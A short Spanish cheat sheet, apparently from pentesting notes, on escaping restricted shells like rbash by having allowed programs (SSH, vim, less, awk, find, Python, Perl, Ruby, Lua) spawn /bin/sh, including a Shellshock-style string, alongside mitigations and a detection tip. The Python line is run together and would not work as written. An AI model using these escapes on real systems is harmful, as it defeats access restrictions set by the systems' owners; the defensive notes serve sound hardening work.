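Restricted Shell
Escapar de una Restricted Shell
Una restricted shell (por ejemplo `rbash`) solo es tan restrictiva como los programas que permite ejecutar: las técnicas que siguen consisten en pedir a un programa permitido que lance otro intérprete. Las tres primeras solicitan por SSH un comando en lugar de la sesión interactiva; en el servidor se evitan fijando el comando con `ForceCommand` en `sshd_config` o con `command="..."` en `authorized_keys`. La tercera parece depender del fallo de importación de funciones de bash conocido como Shellshock, corregido en las versiones parcheadas de bash. Para la detección conviene auditar las ejecuciones de `/bin/sh` o `/bin/bash` cuyo proceso padre sea un editor, un paginador o un intérprete.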
ssh user@10.0.0.3 -t "/bin/sh"
ssh user@10.0.0.3 -t "bash --noprofile"
ssh user@10.0.0.3 -t "(){:;}; /bin/bash"
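# Vim (el modo restringido, `rvim` o `vim -Z`, deshabilita `:shell` y los demás comandos que invocan una shell externa)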
:set shell=/bin/bash
:shell
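# more, less, man, ftp, gdb (todos aceptan `!comando` desde su interfaz interactiva; en less se desactiva con la variable de entorno `LESSSECURE=1`)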
'! /bin/sh'
'!/bin/sh'
'!bash'
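# AWK (cualquier intérprete con `system`/`exec`, como este y los de las secciones siguientes, equivale a una shell completa y no debería figurar entre los binarios permitidos)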
awk 'BEGIN {system("/bin/sh")}'
# Find
find / -name offsec -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
# Python
exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()
# Perl
exec "/bin/sh";
# Ruby
exec "/bin/sh"
# Lua
os.execute('/bin/sh')